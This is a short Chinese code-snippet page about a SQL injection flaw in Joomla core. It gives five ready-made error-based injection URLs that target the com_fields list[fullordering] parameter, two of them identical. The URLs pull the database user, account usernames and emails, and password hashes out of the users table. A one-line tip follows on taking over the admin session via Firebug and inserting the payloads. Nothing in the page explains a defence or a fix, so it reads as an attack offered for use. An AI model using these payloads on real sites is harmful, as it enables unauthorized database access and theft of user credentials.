首页 > 代码库 > joomla core注入漏洞
joomla core注入漏洞
注入语句如下:
payload1 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)‘
payload2 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select concat(username,0x3a,email) from %23__users limit 1)),1)‘
payload3 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select left(password,30) from %23__users limit 1)),1)‘
payload4 = ‘index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)‘
payload5 = ‘index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)‘
访问后台使用firebug更改即可,记得加上用户名
joomla core注入漏洞